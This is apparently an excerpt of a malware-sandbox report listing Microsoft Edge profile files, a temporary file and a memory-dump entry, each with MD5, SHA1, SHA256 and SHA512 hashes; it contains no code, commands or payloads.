| SHA512 | c53b4504987d8a4e56e6719a8836ff491466a15cea6f7dc59ea95eece8ec391280083816fd63c75356bc0727d4d4599394afae7ffdf10730f5feaef137d887db |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | b29bcf9cd0e55f93000b4bb265a9810b |
| SHA1 | e662b8c98bd5eced29495dbe2a8f1930e3f714b8 |
| SHA256 | f53ab2877a33ef4dbde62f23f0cbfb572924a80a3921f47fc080d680107064b4 |
| SHA512 | e15f515e4177d38d6bb83a939a0a8f901ce64dffe45e635063161497d527fbddaf2b1261195fde90b72b4c3e64ac0a0500003faceffcc749471733c9e83eb011 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Reporting and NEL
| MD5 | 0fe257e6dcfdf285494cedd407557b2a |
| SHA1 | 5912049f075037d90a62a7757e47a7929684b9af |
| SHA256 | 99879026e487d0ab47e794961102257ef3edcd2d80b00b83cf882043ca428d15 |
| SHA512 | 918e71c5c1b8bbcf2c181b165443da346d646611d26896afe5aa7e0a2caa850905e8c2ae734e0b32154c1e3ff9a1fe94346e38317fd7f32dfe9c3c3b621f8208 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
| MD5 | ce6d14f00a6e0c01a6d6f55cdc4ee930 |
| SHA1 | e3f4b57330e67888c808178be531726e0993c016 |
| SHA256 | 70180cc75b37a1822a2cdd518beffcf8f71851d810508cc201f0aa72130e5f1f |
| SHA512 | 0da05824a5694baa2a9725d76fb9780a71d9d966f35a947064ecfbdddf15da2232a82f517c5d5840ffe23dda29ad341fff648467858ff9b30113c0b3b1ade482 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3
| MD5 | a21896e163194b58ba2604e24038a2d9 |
| SHA1 | a10103307c73422bac2824fc531db70dfb94e26b |
| SHA256 | 1172e7260b301036dcd37bac770bda801a790a7680b875c908d562003efced83 |
| SHA512 | ac06392c2bd6f0d81efd558e1f7d79065eeb4d17a74ae44acb9b0aeef7a0b1d85e22ccd5dfeee65891eca664c9c6c3c711e235ec9be11305e6444d2730a202bd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
| MD5 | 9796b8f92b226995c58bad2c3b07ac01 |
| SHA1 | 9d905016de5bfb1eaa75fb871d1d01dc58289f53 |
| SHA256 | 89ce2102216cf57d0fab519e78b0e609fe13c8893f66f13cf4a8474a2b3d7476 |
| SHA512 | baa8572e0149bc74b78312a04d428248a1e5306e057500dda5e4f7087c3109a36e1eb80c25a8bf7795aee4f4c4436c68c72b889a6184e6b62a3f91415a63f277 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
| MD5 | 625a420632ffdffc4fbc5984fc2055de |
| SHA1 | 09b2965fa867a1bb10337783a2dc5d837debc095 |
| SHA256 | 740bb1747fd60aab3e731543e0a6bd947deb6fc419e499f3867d735de9d30b63 |
| SHA512 | eedbdc958611230c6351ab3e45a266b1d73fde7a293a2ab8b11db292bef477901cf6482eccd2d76389732069fe6b648fb1327522e103f0f88b83fb5454c9d8e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
| MD5 | 9110d2ab84ff06a17821f84d2007469d |
| SHA1 | 29effdc4d8821dc1bd4cf2bc4b5edeecb00361f6 |
| SHA256 | 1902707b9deccef32f9ad646c7a4c4d862f96d19e3b7dd0790ece3c155467907 |
| SHA512 | 7a26aad3f74965adfd6e8cc7096592cb651537f7493207bb642e2de9fed70ab5030695702e2904f02e14d77db5b1ce1c34e7297c4965aff683276b4bde47d28d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000004
| MD5 | 031d6d1e28fe41a9bdcbd8a21da92df1 |
| SHA1 | 38cee81cb035a60a23d6e045e5d72116f2a58683 |
| SHA256 | b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da |
| SHA512 | e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOG
| MD5 | da779918df84115a4efd2a552dea0d2a |
| SHA1 | f721f2574b31fe11f8f495382ceb44e045be1e78 |
| SHA256 | 334080ffd2ce9c89a75425e138aac8077cad9f14cb189907ddb99cde4450514e |
| SHA512 | f0b74bedb7d7ddfdcaa7d346e0a370f978284830a7f865aba34cb432eb5b989f78492e466bc53c76076c56137a4bfef40cc437d7560a8ad3f4d6df5a1ac31e39 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
| MD5 | 441c260eef8ed9f11fd5fedd20f0e033 |
| SHA1 | 6fb34d0f47535aef5dde743b6998344ee76fee27 |
| SHA256 | 69e98c146b2ecc2c49832da28249e9d18fa494e18082674d6d20cc2f8642b00a |
| SHA512 | 32b15f043a22e6fd5f6b2024ef86d3f68c1a99a728a41c70ae63bf23489486385b316c89cee167f0a328a61d7610d3b68e7c3ed3ba2267ea4b0334022951c816 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
| MD5 | f26561a46f52285db2512568c5504a26 |
| SHA1 | 0a3a3aa6c3004f3a55ae3d3f97f6392e62bfadd1 |
| SHA256 | 82dd18c6315d1b1d82cab232ad935a3184e94e69a5fd5f9a08fc431bd01ce35b |
| SHA512 | 3087e08072e52f8890f1c41881feb2b98452df3983f5b9934b18c10a527eccf1218cee27c45cdc3711b00fd54f34f1b9206593de7098bbbf4059c1b26f69cdd7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences
| MD5 | 40f4430541d517650de68a66cd05166b |
| SHA1 | 3952898583cc84ca77961fe857b05b369b8009e4 |
| SHA256 | 59aadce4a1e785eaea05551ac5f22d27c83be62c375b57ee9e85312851f00e33 |
| SHA512 | 3368b98ba57ad3764fa3b5f42a8ea7da31cc64fb88c0444887aebcd2637f74919caf3ca02c17d357200cab7a059c06b58c498b060eb5168137810442fc752c29 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences
| MD5 | 5c13582d721d8d96909956a503328c69 |
| SHA1 | 3b9993f60ec64569c681e1f9143ff062982cd05c |
| SHA256 | c85fa5102242656889dd23ad6528585078cce533e3e8300ce7d7a183c178eaed |
| SHA512 | bf1f2a261ad6c579a4240d57986923763155437257d3a276a4594e9dce1de66dc440151b0228600c54fdea20a631cd0e52f5a873fcd1ea0b2120a577e81c18fc |
memory/2308-1777-0x000000001BC70000-0x000000001BD90000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpD114.tmp.dat
| MD5 | 87210e9e528a4ddb09c6b671937c79c6 |
| SHA1 | 3c75314714619f5b55e25769e0985d497f0062f2 |
| SHA256 | eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1 |
| SHA512 | f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0 |